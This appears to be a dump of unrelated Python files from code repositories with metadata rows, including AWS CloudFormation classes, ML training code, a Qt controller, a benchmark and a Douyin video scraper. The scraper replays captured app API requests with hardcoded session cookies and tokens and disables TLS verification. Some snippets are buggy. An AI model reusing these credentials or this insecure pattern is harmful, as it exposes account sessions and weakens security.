AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationOutput"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html
Property Document:
- ``rp_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-applicationname
- ``rp_Output``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-output
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationOutput"
rp_ApplicationName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-applicationname"""
rp_Output: typing.Union['PropApplicationOutputOutput', dict] = attr.ib(
default=None,
converter=PropApplicationOutputOutput.from_dict,
validator=attr.validators.instance_of(PropApplicationOutputOutput),
metadata={AttrMeta.PROPERTY_NAME: "Output"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationoutput.html#cfn-kinesisanalyticsv2-applicationoutput-output"""
@attr.s
class ApplicationReferenceDataSource(Resource):
"""
AWS Object Type = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html
Property Document:
- ``rp_ApplicationName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-applicationname
- ``rp_ReferenceDataSource``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource
"""
AWS_OBJECT_TYPE = "AWS::KinesisAnalyticsV2::ApplicationReferenceDataSource"
rp_ApplicationName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ApplicationName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-applicationname"""
rp_ReferenceDataSource: typing.Union['PropApplicationReferenceDataSourceReferenceDataSource', dict] = attr.ib(
default=None,
converter=PropApplicationReferenceDataSourceReferenceDataSource.from_dict,
validator=attr.validators.instance_of(PropApplicationReferenceDataSourceReferenceDataSource),
metadata={AttrMeta.PROPERTY_NAME: "ReferenceDataSource"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-kinesisanalyticsv2-applicationreferencedatasource.html#cfn-kinesisanalyticsv2-applicationreferencedatasource-referencedatasource"""
| 70.662987 | 292 | 0.806572 |
f51eff90ca841ee72accff3faef75c4e7bd858be | 1,035 | py | Python | Curso/paquete/41_filter.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/41_filter.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/41_filter.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | """
Filter: Funciones de orden superior (programación funcional).
Verifica que los elementos de una lista cumplan una determinada condición, devolviendo
un objeto iterable (iterador) con los elementos que cumplieron con la condición.
"""
edades = [12, 11, 24, 36, 8, 6, 10, 41, 32, 58, 14, 50, 7]
def mayor_edad(edad):
return edad >= 18
edades_mayores_edad = list(filter(mayor_edad, edades))
print(edades_mayores_edad)
edades_menores_edad = list(filter(lambda edad: edad < 18, edades))
print(edades_menores_edad)
class Persona:
def __init__(self, nom, eda):
self.nombre = nom
self.edad = eda
def __str__(self):
txt = "{0} tiene {1} años."
return txt.format(self.nombre, self.edad)
personas = [
Persona("Alberto", 32),
Persona("Anna", 16),
Persona("Andy", 27),
Persona("Jesús", 25),
Persona("Cecilia", 19),
Persona("Laura", 30)
]
perosnas_mayores_edad = list(filter(lambda pax: pax.eadad >= 18, personas))
for per in perosnas_mayores_edad:
print(per)
| 23.522727 | 86 | 0.676329 |
e1fafbf1c177c2e91863fff7c640cad693c00f12 | 4,478 | py | Python | 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/douying.py | 13060923171/xianmu | 3deb9cdcf4ed1d821043ba1d3947ff35697e4aae | [
"MIT"
] | 29 | 2020-08-02T12:06:10.000Z | 2022-03-07T17:51:54.000Z | 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/douying.py | 13060923171/xianmu | 3deb9cdcf4ed1d821043ba1d3947ff35697e4aae | [
"MIT"
] | 3 | 2020-08-16T15:56:47.000Z | 2021-11-20T21:49:59.000Z | 抖音爬取签名,喜欢列表和关注列表/爬取抖音的用户信息和视频连接/douying.py | 13060923171/xianmu | 3deb9cdcf4ed1d821043ba1d3947ff35697e4aae | [
"MIT"
] | 15 | 2020-08-16T08:28:08.000Z | 2021-09-29T07:17:38.000Z | import requests
import urllib3
'''
GET https://api3-core-c-hl.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1587528101000&sec_user_id=MS4wLjABAAAA4s3jerVDPUA_xvyoGhRypnn8ijAtUfrt9rCWL2aXxtU&count=10&ts=1587635299&host_abi=armeabi-v7a&_rticket=1587635299508&mcc_mnc=46007& HTTP/1.1
Host: api3-core-c-hl.amemv.com
Connection: keep-alive
Cookie: odin_tt=fab0188042f9c0722c90b1fbaf5233d30ddb78a41267bacbfc7c1fb216d37344df795f4e08e975d557d0c274b1c761da039574e4eceaae4a8441f72167d64afb
X-SS-REQ-TICKET: 1587635299505
sdk-version: 1
X-SS-DP: 1128
x-tt-trace-id: 00-a67026290de17aa15402ce8ee4a90468-a67026290de17aa1-01
User-Agent: com.ss.android.ugc.aweme/100801 (Linux; U; Android 5.1.1; zh_CN; MI 9; Build/NMF26X; Cronet/TTNetVersion:8109b77c 2020-04-15 QuicVersion:0144d358 2020-03-24)
X-Gorgon: 0404c0d100004fe124c18b36d03baf0768c181e105b1af5e8167
X-Khronos: 1587635299
x-common-params-v2: os_api=22&device_platform=android&device_type=MI%209&iid=78795828897640&version_code=100800&app_name=aweme&openudid=80c5f2708a3b6304&device_id=3966668942355688&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=100801&dpi=320&cdid=e390170c-0cb5-42ad-8bf6-d25dc4c7e3a3&version_name=10.8.0&resolution=900*1600&language=zh&device_brand=Xiaomi&app_type=normal&ac=wifi&update_version_code=10809900&uuid=863254643501389
'''
# 下载视频代码,创建一个文件夹来存放抖音的视频
def download_video(url, title):
with open("{}.mp4".format(title), "wb") as f:
f.write(requests.get(url).content)
print("下载视频{}完毕".format(title))
#怎么去爬取APP里面的视频
def get_video():
#通过我们的fiddler这个抓包工具来获取我们想要爬取某个账户里面全部视频的URL
url = "GET https://api3-core-c-lf.amemv.com/aweme/v1/aweme/post/?source=0&publish_video_strategy_type=0&max_cursor=1590752981000&sec_user_id=MS4wLjABAAAAcXW9VYbv07hczERdiLoQil_TRW6GbwWc_BuRU1pczaCq9GQavlvKFhl_qIqE4yZ6&count=10&ts=1594477988&cpu_support64=false&storage_type=0&host_abi=armeabi-v7a&_rticket=1594477986155&mac_address=80%3AC5%3AF2%3A70%3A8A%3A3B&mcc_mnc=46007& HTTP/1.1"
#构建我们的headers,这些对应的数据都是通过我们的fiddler获取的
headers = {
'Host': 'api3-core-c-lf.amemv.com',
'Connection': 'keep-alive',
'Cookie': 'install_id=2339350999993501; ttreq=1$7a4d72914f4cef66e2e2ff13b5dc74a9ab180c06; passport_csrf_token=a4f3fb89f64b4fa8c707293c951c0c17; d_ticket=19b0a970bd0b508bdde6a5128f580f540c2d6; odin_tt=c3c9b378984696b77432b71b951c0e34a773411cce385120c69196cc6529b214c7d5c8716d1fc6f4cc2cb701d61a48b4; sid_guard=fdbd63a338be8acb4a08a1621c41fea6%7C1594464835%7C5184000%7CWed%2C+09-Sep-2020+10%3A53%3A55+GMT; uid_tt=760bb76af4748dcf85a4a0c5a9c5b146; uid_tt_ss=760bb76af4748dcf85a4a0c5a9c5b146; sid_tt=fdbd63a338be8acb4a08a1621c41fea6; sessionid=fdbd63a338be8acb4a08a1621c41fea6; sessionid_ss=fdbd63a338be8acb4a08a1621c41fea6',
'X-SS-REQ-TICKET': '1594464868804',
'passport-sdk-version': '17',
'X-Tt-Token': '00fdbd63a338be8acb4a08a1621c41fea6c5165e3a78a6e6e8bad4d8602a9fba4f29f111b5425b14f07ecf6df18c6b940518',
'sdk-version': '2',
'X-SS-DP': '1128',
'x-tt-trace-id': '00-3d831b3e0d9bfa0994c2b4de0dc30468-3d831b3e0d9bfa09-01',
'User-Agent': 'com.ss.android.ugc.aweme/110801 (Linux; U; Android 5.1.1; zh_CN; OPPO R11 Plus; Build/NMF26X; Cronet/TTNetVersion:71e8fd11 2020-06-10 QuicVersion:7aee791b 2020-06-05)',
'Accept-Encoding': 'gzip, deflate',
'X-Gorgon': '0404d8954001fffd06f451b46c120f09798b487f8c591c2f6bce',
'X-Khronos': '1594464868',
'x-common-params-v2': 'os_api=22&device_platform=android&device_type=OPPO%20R11%20Plus&iid=2339350999993501&version_code=110800&app_name=aweme&openudid=c5c0babc0b33a19b&device_id=2743971277974349&os_version=5.1.1&aid=1128&channel=tengxun_new&ssmix=a&manifest_version_code=110801&dpi=320&cdid=92d6111d-fa05-4987-a2bf-13b22d7caec2&version_name=11.8.0&resolution=900*1600&language=zh&device_brand=OPPO&app_type=normal&ac=wifi&update_version_code=11809900&uuid=866174600901389',
}
#无视证书的请求
requests.packages.urllib3.disable_warnings()
html = requests.get(url, headers=headers, verify=False)
#把数据用json来全部获取下来
json_data = html.json()["aweme_list"]
#循环叠带我们的数据,把它们一一展示出来
for j in json_data:
title = j['desc']
print(title)
print(j['video']['play_addr']['url_list'][0])
#把最后每个视频对应的URL打印出来,再根据我们的下载函数,把它们全部下载到自己的电脑里面
download_video(j['video']['play_addr']['url_list'][0], title)
if __name__ == '__main__':
get_video() | 69.96875 | 628 | 0.792541 |
f21a3256b17eeb96c8b30caae7ed89f9a8f1e826 | 225 | py | Python | blog/forms.py | emreatadl/atadil-personal-blog | 88c7be19d6a27b39fd86ff3d9c34b11443291e0e | [
"MIT"
] | 1 | 2021-08-23T18:30:39.000Z | 2021-08-23T18:30:39.000Z | blog/forms.py | emreatadl/atadil-personal-blog | 88c7be19d6a27b39fd86ff3d9c34b11443291e0e | [
"MIT"
] | 1 | 2021-06-02T02:44:15.000Z | 2021-06-02T02:44:15.000Z | blog/forms.py | emreatadl/atadil-personal-blog | 88c7be19d6a27b39fd86ff3d9c34b11443291e0e | [
"MIT"
] | null | null | null | from django import forms
from .models import Comment
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = (
'author',
'email',
'comment'
) | 17.307692 | 35 | 0.528889 |
1f385a96bb33542591c5e83aa3bccfc2d936b58f | 6,614 | py | Python | OLD_MNIST_train_test.py | sansseriff/ee148_FinalProject | 64938c7cb9bd3f9bcf295eb134dbaa209f76f88a | [
"MIT"
] | null | null | null | OLD_MNIST_train_test.py | sansseriff/ee148_FinalProject | 64938c7cb9bd3f9bcf295eb134dbaa209f76f88a | [
"MIT"
] | null | null | null | OLD_MNIST_train_test.py | sansseriff/ee148_FinalProject | 64938c7cb9bd3f9bcf295eb134dbaa209f76f88a | [
"MIT"
] | null | null | null |
def train(args, model, device, train_loader, optimizer, epoch):
'''
#This is your training function. When you call this function, the model is
#trained for 1 epoch.
'''
model.train() # Set the model to training mode
total_loss = 0
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad() # Clear the gradient
output, hidden_layer = model(data) # Make predictions
loss = F.nll_loss(output, target) # Compute loss
loss.backward() # Gradient computation
optimizer.step() # Perform a single optimization step
if batch_idx % args.log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.sampler),
100. * batch_idx / len(train_loader), loss.item()))
total_loss = total_loss + loss.item()
#train loss for each epoch is an average of the loss over all mini-batches
train_loss = total_loss/batch_idx
return train_loss
# OLD test MNIST for refernce
def test(model, device, test_loader, evaluate = False):
model.eval() # Set the model to inference mode
test_loss = 0
correct = 0
test_num = 0
images = []
allimages = []
master_preds = []
master_truths = []
master_hidden_layers = []
with torch.no_grad(): # For the inference step, gradient is not computed
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output, hidden_layer = model(data)
#feature_extractor = torch.nn.Sequential(*list(model.children())[:-1])
test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
print(len(hidden_layer))
print(len(hidden_layer[0]))
#print(hidden_layer[0])
correct += pred.eq(target.view_as(pred)).sum().item()
test_num += len(data)
if evaluate:
for i in range(len(pred)):
master_preds.append(pred[i][0].item())
master_truths.append(target[i].item())
layer = hidden_layer[i].cpu()
master_hidden_layers.append(layer.numpy())
image = data[i][0].cpu()
allimages.append(image.numpy())
if pred[i][0] == target[i]:
continue
else:
#print("not equal")
#print("pred is ", pred[i][0].item(), "and target is ", target[i].item())
image = data[i][0].cpu()
images.append([image.numpy(),pred[i][0].item(),target[i].item()])
if evaluate:
#print(len(master_hidden_layers))
#print(master_hidden_layers[0])
distances = np.zeros(len(master_hidden_layers))
#x0 = master_hidden_layers[0]
for i in range(len(distances)):
length = 0
for dim in range(len(master_hidden_layers[0])):
length = length + (master_hidden_layers[i][dim] - master_hidden_layers[15][dim])**2
length = math.sqrt(length)
distances[i] = length
sorted_distance_index = np.argsort(distances)
figa = plt.figure()
print("test")
for i in range(9):
sub = figa.add_subplot(9, 1, i + 1)
sub.imshow(allimages[sorted_distance_index[i]], interpolation='nearest', cmap='gray')
X = master_hidden_layers
y = np.array(master_truths)
tsne = TSNE(n_components=2, random_state=0)
X_2d = np.array(tsne.fit_transform(X))
target_ids = range(10)
cdict = {0: 'orange', 1: 'red', 2: 'blue', 3: 'green', 4: 'salmon', 5:'c', 6: 'm', 7: 'y', 8: 'k', 9: 'lime'}
fig, ax = plt.subplots()
for g in np.unique(y):
ix = np.where(y == g)
ax.scatter(X_2d[ix, 0], X_2d[ix, 1], c=cdict[g], label=g, s=5)
ax.legend()
plt.show()
#i = 1
#plt.figure(figsize=(6, 5))
#plt.scatter(X_2d[10*i:10*i+10,0],X_2d[:10,1])
CM = confusion_matrix(master_truths,master_preds)
CMex = CM
#for i in range(len(CM)):
# for j in range(len(CM)):
# if CM[i][j] > 0:
# CMex[i][j] = log(CM[i][j])
# else:
# CMex[i][j] = CM[i][j]
print(CM)
print(CMex)
df_cm = pd.DataFrame(CM, range(10), range(10))
#plt.figure(figsize=(10,7))
fig0,ax0 = plt.subplots(1)
sn.set(font_scale=1) # for label size
sn.heatmap(df_cm, annot=True, annot_kws={"size": 11}) # font size
#ax0.set_ylim(len(CMex) - 0.5, 0.5)
plt.xlabel("predicted")
plt.ylabel("ground truth")
plt.show()
fig = plt.figure()
for i in range(9):
sub = fig.add_subplot(3, 3, i + 1)
sub.imshow(images[i + 10][0], interpolation='nearest', cmap='gray')
title = "Predicted: " + str(images[i+ 10][1]) + " True: " + str(images[i+ 10][2])
sub.set_title(title)
kernels = model.conv1.weight.cpu().detach().clone()
kernels = kernels - kernels.min()
kernels = kernels / kernels.max()
kernels = kernels.numpy()
print(np.shape(kernels))
fig2 = plt.figure()
for i in range(8):
sub = fig2.add_subplot(2, 4, i + 1)
sub.imshow(kernels[i][0], interpolation='nearest', cmap='gray')
title = "Kernel #" + str(i + 1)
sub.set_title(title)
#fig, axs = plt.subplots(3, 3, constrained_layout=True)
#for i in range(9):
# fig[i].imshow(images[i][0], interpolation='nearest', cmap='gray')
# axs[i].set_title("all titles")
test_loss /= test_num
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\n'.format(
test_loss, correct, test_num,
100. * correct / test_num))
return test_loss
| 34.092784 | 121 | 0.513456 |
f271b87283aadabb9026ab47462e1036593b6b47 | 1,207 | py | Python | classification/utils/cutout.py | voldemortX/DST-CBC | e392313c129f6814c1a1c0f20c0abbd5505c3d7d | [
"BSD-3-Clause"
] | 103 | 2020-04-21T01:25:16.000Z | 2022-03-24T07:45:45.000Z | classification/utils/cutout.py | voldemortX/DST-CBC | e392313c129f6814c1a1c0f20c0abbd5505c3d7d | [
"BSD-3-Clause"
] | 13 | 2021-03-24T06:52:21.000Z | 2022-01-18T08:17:50.000Z | classification/utils/cutout.py | voldemortX/DST-CBC | e392313c129f6814c1a1c0f20c0abbd5505c3d7d | [
"BSD-3-Clause"
] | 12 | 2020-04-29T02:33:11.000Z | 2021-12-28T07:59:20.000Z | # Copied from uoguelph-mlrg/Cutout
import torch
import numpy as np
class Cutout(object):
"""Randomly mask out one or more patches from an image.
Args:
n_holes (int): Number of patches to cut out of each image.
length (int): The length (in pixels) of each square patch.
"""
def __init__(self, n_holes, length):
self.n_holes = n_holes
self.length = length
def __call__(self, img):
"""
Args:
img (Tensor): Tensor image of size (C, H, W).
Returns:
Tensor: Image with n_holes of dimension length x length cut out of it.
"""
h = img.size(1)
w = img.size(2)
mask = np.ones((h, w), np.float32)
for n in range(self.n_holes):
y = np.random.randint(h)
x = np.random.randint(w)
y1 = np.clip(y - self.length // 2, 0, h)
y2 = np.clip(y + self.length // 2, 0, h)
x1 = np.clip(x - self.length // 2, 0, w)
x2 = np.clip(x + self.length // 2, 0, w)
mask[y1: y2, x1: x2] = 0.
mask = torch.from_numpy(mask)
mask = mask.expand_as(img)
img = img * mask
return img
| 26.822222 | 82 | 0.528583 |
fdef9f4a13087312fde8e594440a942c62ea763c | 4,277 | py | Python | rapid/gui/controller.py | jensengrouppsu/rapid | 9f925e0561327a169a44b45df2cd6dd1af188023 | [
"MIT"
] | 1 | 2021-05-12T22:40:20.000Z | 2021-05-12T22:40:20.000Z | rapid/gui/controller.py | lassejensen-psu/rapid | 9f925e0561327a169a44b45df2cd6dd1af188023 | [
"MIT"
] | null | null | null | rapid/gui/controller.py | lassejensen-psu/rapid | 9f925e0561327a169a44b45df2cd6dd1af188023 | [
"MIT"
] | 1 | 2017-03-03T23:21:41.000Z | 2017-03-03T23:21:41.000Z | from __future__ import print_function, division, absolute_import
# Non-std. lib imports
from PySide.QtCore import Signal, QObject
from numpy import ndarray, isnan, sum
# Local imports
from rapid.common import spectrum
from rapid.gui.peak import PeakModel
from rapid.gui.exchange import ExchangeModel, NumPeaks
from rapid.gui.rate import Rate
from rapid.gui.scale import Scale
class Controller(QObject):
'''Class to hold all information about the function'''
def __init__(self, parent):
'''Initialize the controller class'''
super(Controller, self).__init__(parent)
self.rate = Rate(self)
self.numpeaks = NumPeaks(self)
self.exchange = ExchangeModel(self)
self.peak = PeakModel(self)
self.scale = Scale(self)
self._makeConnections()
self.oldParams = None
self.newParams = None
self.rateParams = None
self.exchangeParams = None
self.limits = None
self.hasPlot = False
def _makeConnections(self):
'''Connect the contained widgets'''
# When the number of peaks changes, change the matrix size
self.numpeaks.numberOfPeaksChanged.connect(self.changeNumberOfPeaks)
# When the number of peaks changes, also change the number of tab pages
self.numpeaks.numberOfPeaksChanged.connect(self.peak.changePeakNum)
# When any of the values are updated, re-plot
self.rate.rateChanged.connect(self.setDataForPlot)
self.exchange.matrixChanged.connect(self.setDataForPlot)
self.peak.inputParamsChanged.connect(self.setDataForPlot)
# Change the plot scale
self.scale.scaleChanged.connect(self.changeScale)
def getParametersForScript(self):
'''Return the parameters in a format to make a script file'''
xlim = self.limits[0], self.limits[1]
reverse = self.limits[2]
return xlim, reverse, self.oldParams, self.newParams
def getParametersForInput(self):
'''Return the parameters in a format to make an input file'''
rate = self.rate.getParams()
exchange = self.exchange.getParams(self.numpeaks.getNumPeaks())
xlim = self.limits[0], self.limits[1]
reverse = self.limits[2]
return xlim, reverse, rate, exchange, self.oldParams
#######
# SLOTS
#######
def changeNumberOfPeaks(self):
'''Apply a change in the number of peaks'''
self.exchange.resizeMatrix(self.numpeaks.numPeaks)
def setDataForPlot(self):
'''Assembles the data for plotting, calculates the spectrum, then emits'''
# Assemble values
omega = self.scale.getDomain()
npeaks = self.numpeaks.getNumPeaks()
k = self.rate.getConvertedRate()
Z = self.exchange.getMatrix()
self.oldParams = self.peak.getParams()
vib, GL, GG, h = self.oldParams
# Don's plot if there is some error
if k == 0 or k is None:
return
elif npeaks != len(vib) or isnan(sum(vib)):
return
elif npeaks != len(GL) or isnan(sum(GL)):
return
elif npeaks != len(GG) or isnan(sum(GG)):
return
elif npeaks != len(h) or isnan(sum(h)):
return
elif npeaks != len(Z):
return
elif len(omega) == 0:
return
else:
self.hasPlot = True
# Calculate spectrum
I, self.newParams = spectrum(Z, k, vib, GL, GG, h, omega)
# Send spectrum to plotter and new parameters to peak
self.plotSpectrum.emit(omega, I)
self.peak.setNewParams(*self.newParams)
# Store data for later
self.rateParams = self.rate.getParams()
self.exchangeParams = self.exchange.getParams(npeaks)
self.limits = self.scale.getScale()
def changeScale(self, recalculate):
'''Emit the new scale to use after re-plotting with new domain'''
if recalculate:
self.setDataForPlot()
min, max, rev = self.scale.getScale()
self.newXLimits.emit(min, max, rev)
#########
# SIGNALS
#########
# Plot the data
plotSpectrum = Signal(ndarray, ndarray)
# Change the scale
newXLimits = Signal(int, int, bool)
| 33.944444 | 82 | 0.631985 |
0af9039aca18f5bd4ba800252a0ca6ad845d181b | 10,944 | py | Python | Tools/benchmarks/richards_static_basic_lib.py | mananpal1997/cinder | a8804cc6e3a5861463ff959abcd09ad60a0763e5 | [
"CNRI-Python-GPL-Compatible"
] | 1,886 | 2021-05-03T23:58:43.000Z | 2022-03-31T19:15:58.000Z | Tools/benchmarks/richards_static_basic_lib.py | mananpal1997/cinder | a8804cc6e3a5861463ff959abcd09ad60a0763e5 | [
"CNRI-Python-GPL-Compatible"
] | 70 | 2021-05-04T23:25:35.000Z | 2022-03-31T18:42:08.000Z | Tools/benchmarks/richards_static_basic_lib.py | mananpal1997/cinder | a8804cc6e3a5861463ff959abcd09ad60a0763e5 | [
"CNRI-Python-GPL-Compatible"
] | 52 | 2021-05-04T21:26:03.000Z | 2022-03-08T18:02:56.000Z | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
"""
based on a Java version:
Based on original version written in BCPL by Dr Martin Richards
in 1981 at Cambridge University Computer Laboratory, England
and a C++ version derived from a Smalltalk version written by
L Peter Deutsch.
Java version: Copyright (C) 1995 Sun Microsystems, Inc.
Translation from C++, Mario Wolczko
Outer loop added by Alex Jacoby
"""
from __future__ import annotations
import __static__
from __static__ import cast
import sys
from typing import Final, List
# Task IDs
I_IDLE: Final[int] = 1
I_WORK: Final[int] = 2
I_HANDLERA: Final[int] = 3
I_HANDLERB: Final[int] = 4
I_DEVA: Final[int] = 5
I_DEVB: Final[int] = 6
# Packet types
K_DEV: Final[int] = 1000
K_WORK: Final[int] = 1001
# Packet
BUFSIZE: Final[int] = 4
BUFSIZE_RANGE: List[int] = list(range(BUFSIZE))
class Packet(object):
def __init__(self, l: Packet | None, i: int, k: int) -> None:
self.link: Packet | None = l
self.ident: int = i
self.kind: int = k
self.datum: int = 0
self.data: List[int] = [0] * BUFSIZE
def append_to(self, lst: Packet | None) -> Packet:
self.link = None
if lst is None:
return self
else:
p = lst
next = p.link
while next is not None:
p = next
next = p.link
p.link = self
return lst
# Task Records
class TaskRec(object):
pass
class DeviceTaskRec(TaskRec):
def __init__(self) -> None:
self.pending: Packet | None = None
class IdleTaskRec(TaskRec):
def __init__(self) -> None:
self.control: int = 1
self.count: int = 10000
class HandlerTaskRec(TaskRec):
def __init__(self) -> None:
self.work_in: Packet | None = None
self.device_in: Packet | None = None
def workInAdd(self, p: Packet) -> Packet | None:
self.work_in = p.append_to(self.work_in)
return self.work_in
def deviceInAdd(self, p: Packet) -> Packet | None:
self.device_in = p.append_to(self.device_in)
return self.device_in
class WorkerTaskRec(TaskRec):
def __init__(self) -> None:
self.destination: int = I_HANDLERA
self.count: int = 0
# Task
class TaskState(object):
def __init__(self) -> None:
self.packet_pending: bool = True
self.task_waiting: bool = False
self.task_holding: bool = False
def packetPending(self) -> TaskState:
self.packet_pending = True
self.task_waiting = False
self.task_holding = False
return self
def waiting(self) -> TaskState:
self.packet_pending = False
self.task_waiting = True
self.task_holding = False
return self
def running(self) -> TaskState:
self.packet_pending = False
self.task_waiting = False
self.task_holding = False
return self
def waitingWithPacket(self) -> TaskState:
self.packet_pending = True
self.task_waiting = True
self.task_holding = False
return self
def isPacketPending(self) -> bool:
return self.packet_pending
def isTaskWaiting(self) -> bool:
return self.task_waiting
def isTaskHolding(self) -> bool:
return self.task_holding
def isTaskHoldingOrWaiting(self) -> bool:
return self.task_holding or (not self.packet_pending and self.task_waiting)
def isWaitingWithPacket(self) -> bool:
return self.packet_pending and self.task_waiting and not self.task_holding
tracing: bool = False
layout: int = 0
def trace(a):
global layout
layout -= 1
if layout <= 0:
print()
layout = 50
print(a, end='')
TASKTABSIZE: Final[int] = 10
class TaskWorkArea(object):
def __init__(self) -> None:
self.taskTab: List[Task | None] = [None] * TASKTABSIZE
self.taskList: Task | None = None
self.holdCount: int = 0
self.qpktCount: int = 0
taskWorkArea: Final[TaskWorkArea] = TaskWorkArea()
class Task(TaskState):
def __init__(self, i: int, p: int, w: Packet | None, initialState: TaskState, r: TaskRec) -> None:
self.link: Task | None = taskWorkArea.taskList
self.ident: int = i
self.priority: int = p
self.input: Packet | None = w
self.packet_pending: bool = initialState.isPacketPending()
self.task_waiting: bool = initialState.isTaskWaiting()
self.task_holding: bool = initialState.isTaskHolding()
self.handle: TaskRec = r
taskWorkArea.taskList = self
taskWorkArea.taskTab[i] = self
def fn(self, pkt: Packet | None, r: TaskRec) -> Task | None:
raise NotImplementedError
def addPacket(self, p: Packet, old: Task) -> Task:
if self.input is None:
self.input = p
self.packet_pending = True
if self.priority > old.priority:
return self
else:
p.append_to(self.input)
return old
def runTask(self) -> Task | None:
if self.isWaitingWithPacket():
msg = self.input
assert msg is not None
self.input = msg.link
if self.input is None:
self.running()
else:
self.packetPending()
else:
msg = None
return self.fn(msg, self.handle)
def waitTask(self) -> Task:
self.task_waiting = True
return self
def hold(self) -> Task | None:
taskWorkArea.holdCount += 1
self.task_holding = True
return self.link
def release(self, i: int) -> Task:
t = self.findtcb(i)
t.task_holding = False
if t.priority > self.priority:
return t
else:
return self
def qpkt(self, pkt: Packet) -> Task:
t = self.findtcb(pkt.ident)
taskWorkArea.qpktCount += 1
pkt.link = None
pkt.ident = self.ident
return t.addPacket(pkt, self)
def findtcb(self, id: int) -> Task:
t = taskWorkArea.taskTab[id]
assert t is not None
return t
# DeviceTask
class DeviceTask(Task):
def __init__(self, i: int, p: int, w: Packet | None, s: TaskState, r: DeviceTaskRec) -> None:
Task.__init__(self, i, p, w, s, r)
def fn(self, pkt: Packet | None, r: TaskRec) -> Task:
d: DeviceTaskRec = cast(DeviceTaskRec, r)
if pkt is None:
pkt = d.pending
if pkt is None:
return self.waitTask()
else:
d.pending = None
return self.qpkt(pkt)
else:
d.pending = pkt
if tracing:
trace(pkt.datum)
return cast(Task, self.hold())
class HandlerTask(Task):
def __init__(self, i: int, p: int, w: Packet | None, s: TaskState, r: HandlerTaskRec) -> None:
Task.__init__(self, i, p, w, s, r)
def fn(self, pkt: Packet | None, r: TaskRec) -> Task:
h: HandlerTaskRec = cast(HandlerTaskRec, r)
if pkt is not None:
if pkt.kind == K_WORK:
h.workInAdd(pkt)
else:
h.deviceInAdd(pkt)
work = h.work_in
if work is None:
return self.waitTask()
count = work.datum
if count >= BUFSIZE:
h.work_in = work.link
return self.qpkt(work)
dev = h.device_in
if dev is None:
return self.waitTask()
h.device_in = dev.link
dev.datum = work.data[count]
work.datum = count + 1
return self.qpkt(dev)
# IdleTask
class IdleTask(Task):
def __init__(self, i: int, p: int, w: int, s: TaskState, r: IdleTaskRec) -> None:
Task.__init__(self, i, 0, None, s, r)
def fn(self, pkt: Packet | None, r: TaskRec) -> Task | None:
i: IdleTaskRec = cast(IdleTaskRec, r)
i.count -= 1
if i.count == 0:
return self.hold()
elif i.control & 1 == 0:
i.control //= 2
return self.release(I_DEVA)
else:
i.control = i.control // 2 ^ 0xd008
return self.release(I_DEVB)
# WorkTask
A: Final[int] = 65 # ord('A')
class WorkTask(Task):
def __init__(self, i: int, p: int, w: Packet | None, s: TaskState, r: WorkerTaskRec) -> None:
Task.__init__(self, i, p, w, s, r)
def fn(self, pkt: Packet | None, r: TaskRec) -> Task:
w: WorkerTaskRec = cast(WorkerTaskRec, r)
if pkt is None:
return self.waitTask()
if w.destination == I_HANDLERA:
dest = I_HANDLERB
else:
dest = I_HANDLERA
w.destination = dest
pkt.ident = dest
pkt.datum = 0
i = 0
while i < BUFSIZE:
x = w.count + 1
w.count = x
if w.count > 26:
